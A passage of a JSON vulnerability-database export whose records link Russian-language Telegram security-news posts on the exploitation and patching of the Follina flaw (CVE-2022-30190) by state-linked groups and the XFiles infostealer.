\u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u043c\u0438 \u0430\u0442\u0430\u043a\u0430\u043c\u0438 \u043d\u0430 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0435 \u0421\u041c\u0418 \u043c\u043e\u0436\u0435\u0442 \u0441\u0442\u043e\u044f\u0442\u044c APT-\u0433\u0440\u0443\u043f\u043f\u0430 Sandworm, \u0441\u0432\u044f\u0437\u044b\u0432\u0430\u0435\u043c\u0430\u044f \u0441 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e\u043c \u0420\u0424.\n\n#\u0425\u0430\u043a\u0435\u0440\u044b #Sandworm #Follina\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-06-14T15:48:06.000000Z"}, {"uuid": "270b2c4d-fb8a-4cda-8edc-c4c7c138e99b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/772", "content": "\u200b\u26a1\ufe0f 
\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina \u0441\u0442\u0430\u043b\u0430 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0438\u043c \u043a\u0438\u0431\u0435\u0440\u043e\u0440\u0443\u0436\u0438\u0435\u043c.\n\n\ud83d\udcac \u041d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u0441\u0443\u0431\u044a\u0435\u043a\u0442 \u0443\u0433\u0440\u043e\u0437\u044b, \u0441\u043f\u043e\u043d\u0441\u0438\u0440\u0443\u0435\u043c\u044b\u0439 \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u043e\u043c, \u043f\u0440\u043e\u0432\u0435\u043b \u043d\u043e\u0432\u0443\u044e \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0443 \u043d\u0430 \u0433\u043e\u0441\u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u0415\u0432\u0440\u043e\u043f\u044b \u0438 \u0421\u0428\u0410. \u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Proofpoint \u0437\u0430\u044f\u0432\u0438\u043b\u0430, \u0447\u0442\u043e \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 CVE-2022-30190 c \u043e\u0446\u0435\u043d\u043a\u043e\u0439 CVSS 7,8. 
\u0426\u0435\u043b\u044f\u043c \u0431\u044b\u043b\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u0435 1000 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0445 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0445 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442-\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0443.\n\n\u00ab\u042d\u0442\u0430 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u043f\u043e\u0434 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u044b \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 RTF \u0441 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430, \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0441 45.76.53[.]253\u00bb, \u2014 \u043d\u0430\u043f\u0438\u0441\u0430\u043b\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0432 Twitter .\n\n\u041f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0432 \u0432\u0438\u0434\u0435 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f PowerShell \u0438\u043c\u0435\u0435\u0442 \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u0443 Base64 \u0438 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u0443\u0435\u0442 \u043a\u0430\u043a \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f PowerShell \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0441 \u0438\u043c\u0435\u043d\u0435\u043c 
\u00abseller-notification[.]live\u00bb.\n\n\u00ab\u042d\u0442\u043e\u0442 \u0441\u043a\u0440\u0438\u043f\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 , \u043a\u0440\u0430\u0434\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438\u0437 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432, \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0438 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0445 \u0441\u043b\u0443\u0436\u0431, \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u0430 \u0437\u0430\u0442\u0435\u043c \u0430\u0440\u0445\u0438\u0432\u0438\u0440\u0443\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u0434\u043b\u044f \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 45.77.156[.]179\u00bb, \u2014 \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0438 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b Proofpoint.\n\n\u0424\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u0430\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043d\u0435 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u043e\u0439, \u043d\u043e \u043e\u043d\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u043e\u0432\u0430\u043d\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u043e\u0439 \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0430 \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u043a\u0438 \u0430\u0442\u0430\u043a\u0438 \u0438 
\u0448\u0438\u0440\u043e\u043a\u0438\u0445 \u0440\u0430\u0437\u0432\u0435\u0434\u044b\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 PowerShell.\n\n\u00ab\u041e\u0431\u0448\u0438\u0440\u043d\u0430\u044f \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0430, \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u043d\u0430\u044f \u0432\u0442\u043e\u0440\u044b\u043c \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0435\u043c PowerShell, \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0437\u0430\u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043e\u0432\u0430\u043d \u0431\u043e\u043b\u044c\u0448\u0438\u043c \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e\u043c \u041f\u041e \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435 \u0446\u0435\u043b\u0438. 
\u0410\u0442\u0430\u043a\u0430 \u043d\u0430 \u0435\u0432\u0440\u043e\u043f\u0435\u0439\u0441\u043a\u043e\u0435 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e \u0438 \u043c\u0435\u0441\u0442\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u044b \u0432\u043b\u0430\u0441\u0442\u0438 \u0421\u0428\u0410 \u0437\u0430\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u043d\u0430\u0441 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u044c, \u0447\u0442\u043e \u044d\u0442\u0430 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u043e\u043c\u00bb, \u2014 \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0430 Proofpoint.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190 \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Follina \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0441\u0445\u0435\u043c\u0443 URI \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 \u00abms-msdt\u00bb \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0446\u0435\u043b\u0435\u0432\u044b\u043c\u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438 \u0438 \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439. 
\u041f\u043e\u0441\u043b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c Microsoft \u043f\u0440\u0438\u0437\u0432\u0430\u043b\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b , \u0447\u0442\u043e\u0431\u044b \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c \u0432\u0435\u043a\u0442\u043e\u0440 \u0430\u0442\u0430\u043a\u0438. \u0422\u0430\u043a\u0436\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u043d\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0420\u043e\u0441\u0441\u0438\u0438, \u0411\u0435\u043b\u0430\u0440\u0443\u0441\u0438 \u0438 \u0422\u0438\u0431\u0435\u0442\u0430 .\n\n#Follina #\u041a\u0438\u0431\u0435\u0440\u043e\u0440\u0443\u0436\u0438\u0435 #\u0425\u0430\u043a\u0435\u0440\u044b\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-06-06T13:17:42.000000Z"}, {"uuid": "66eb799b-ebd0-4b41-a27c-227c2423e26c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/833", "content": "\u200b\u2694\ufe0f Microsoft \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0443\u044e 0-day Follina \u0438 \u0435\u0449\u0435 55 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439.\n\n\ud83d\udcac \u0418\u0437 55 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0442\u0440\u0438 
\u043a\u043b\u0430\u0441\u0441\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u043a\u0430\u043a \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c RCE-\u0430\u0442\u0430\u043a\u0438. \u0412\u0441\u0435 \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0435 \u043a\u043b\u0430\u0441\u0441\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u043a\u0430\u043a \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0435. \u0412 \u043f\u0430\u0442\u0447 \u043d\u0435 \u0432\u043e\u0448\u043b\u0438 5 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439 Microsoft Edge Chromium, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b\u043b\u0438 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u044b \u0440\u0430\u043d\u0435\u0435 \u043d\u0430 \u044d\u0442\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435.\n\n\u041d\u0438\u0436\u0435 \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u043e \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043e\u0448\u0438\u0431\u043e\u043a \u0432 \u043a\u0430\u0436\u0434\u043e\u0439 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439:\n\n\u2014 12 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439;\n\u2014 1 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0445\u043e\u0434\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438;\n\u2014 27 RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439;\n\u2014 11 
\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438;\n\u2014 3 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442\u043a\u0430\u0437\u0430 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438;\n\u2014 1 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c \u0441\u043f\u0443\u0444\u0438\u043d\u0433.\n\n\u0425\u043e\u0447\u0435\u0442\u0441\u044f \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0435\u0439 0-day Follina. \u041c\u044b \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0437 \u0441\u043e\u043e\u0431\u0449\u0430\u043b\u0438 \u043f\u0440\u043e \u0430\u0442\u0430\u043a\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u043e\u0431\u044a\u044f\u0441\u043d\u0438\u043b\u0438 \u043f\u0440\u0438\u0447\u0438\u043d\u0443 \u0435\u0435 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f.\n\nFollina \u0438\u043b\u0438 \u0436\u0435 CVE-2022-30190 \u0441\u0440\u0430\u0437\u0443 \u0436\u0435 \u043f\u0440\u0438\u0433\u043b\u044f\u043d\u0443\u043b\u0430\u0441\u044c \u0445\u0430\u043a\u0435\u0440\u0430\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u0440\u0438\u043d\u044f\u043b\u0438\u0441\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0435\u0435 \u0432 \u0441\u0432\u043e\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445. 
\u0421\u0430\u043c\u044b\u043c\u0438 \u0433\u0440\u043e\u043c\u043a\u0438\u043c\u0438 \u0441\u043b\u0443\u0447\u0430\u044f\u043c\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441\u0442\u0430\u043b\u0438:\n\n\u2014 \u0410\u0442\u0430\u043a\u0430 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0433\u043e \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e \u0445\u0430\u043a\u0435\u0440\u0430 \u043d\u0430 \u0433\u043e\u0441\u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u0415\u0421 \u0438 \u0421\u0428\u0410;\n\u2014 \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u041f\u041e Qbot;\n\u2014 \u0410\u0442\u0430\u043a\u0430 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 Sandworm \u043d\u0430 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0435 \u0421\u041c\u0418.\n\n\u041f\u0430\u0442\u0447 \u0431\u0443\u0434\u0435\u0442 \u0432\u043a\u043b\u044e\u0447\u0435\u043d \u0432 \u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f Windows \u0437\u0430 \u0438\u044e\u043d\u044c 2022 \u0433\u043e\u0434\u0430.\n\n#Microsoft #Follina #\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-06-16T05:16:47.000000Z"}, {"uuid": "01f88c79-c870-48d1-862f-8cc316e4198f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/924", "content": "\u200b\u2694\ufe0f \u0418\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440 XFiles 
\u0430\u0442\u0430\u043a\u0443\u0435\u0442 Windows \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Follina.\n\n\ud83d\udcac \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 Cyberint \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0438\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440 XFiles \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190 (Follina) \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435 \u0436\u0435\u0440\u0442\u0432\u044b.\n\n\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Word \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 OLE-\u043e\u0431\u044a\u0435\u043a\u0442, \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0449\u0438\u0439 \u043d\u0430 HTML-\u0444\u0430\u0439\u043b \u043d\u0430 \u0432\u043d\u0435\u0448\u043d\u0435\u043c \u0440\u0435\u0441\u0443\u0440\u0441\u0435, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c JavaScript-\u043a\u043e\u0434. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f PowerShell-\u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0434\u043b\u044f \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 Windows \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e. 
\u0414\u0430\u043b\u0435\u0435 \u043c\u043e\u0434\u0443\u043b\u044c \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u044d\u0442\u0430\u043f\u0430 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0448\u0435\u043b\u043b-\u043a\u043e\u0434. \u041e\u043d \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u043b\u044e\u0447\u043e\u043c AES-\u0434\u0435\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c \u0436\u0435 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0447\u0435\u0440\u0435\u0437 \u0432\u044b\u0437\u043e\u0432 API.\n\n\u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f XFiles \u043a\u0440\u0430\u0434\u0435\u0442 cookie-\u0444\u0430\u0439\u043b\u044b, \u043f\u0430\u0440\u043e\u043b\u0438 \u0438 \u0438\u0441\u0442\u043e\u0440\u0438\u044e \u0432\u0435\u0431-\u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430, \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0435\u0442 \u043f\u0430\u0440\u043e\u043b\u044c \u043a\u0440\u0438\u043f\u0442\u043e\u043a\u043e\u0448\u0435\u043b\u044c\u043a\u0430, \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u0441\u043d\u0438\u043c\u043a\u0438 \u044d\u043a\u0440\u0430\u043d\u0430, \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0443\u0435\u0442 \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 Discord \u0438 Telegram.\n\n\u0424\u0430\u0439\u043b\u044b \u0445\u0440\u0430\u043d\u044f\u0442\u0441\u044f \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e \u0432\u043e \u0432\u043d\u043e\u0432\u044c \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0445 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430\u0445 \u0438 
\u043d\u0435\u0437\u0430\u043c\u0435\u0442\u043d\u043e \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u044e\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 Telegram.\n\n#\u0421\u0442\u0438\u043b\u0435\u0440 #\u0425\u0430\u043a\u0435\u0440\u044b #Follina #XFiles\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-07-01T12:58:38.000000Z"}, {"uuid": "fdee8266-f54a-4cdf-8a4d-d5f7ad7af883", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/codeby_sec/5990", "content": "\u200b\ud83d\udccb Microsoft \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0430 \u0434\u0435\u0442\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Microsoft Office\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Microsoft \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0430 \u0434\u0435\u0442\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432\u043e \u0432\u0441\u0435\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0441\u0432\u043e\u0435\u0433\u043e \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0438 \u043e\u0431\u043b\u0430\u0447\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430 Microsoft Office. \u0414\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043f\u043e\u0434 \u043d\u043e\u043c\u0435\u0440\u043e\u043c CVE-2022-30190.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u0432\u0435\u0440\u0441\u0438\u0438 Microsoft Office \u0441 2016 \u043f\u043e 2021 \u0438 Office 365. 
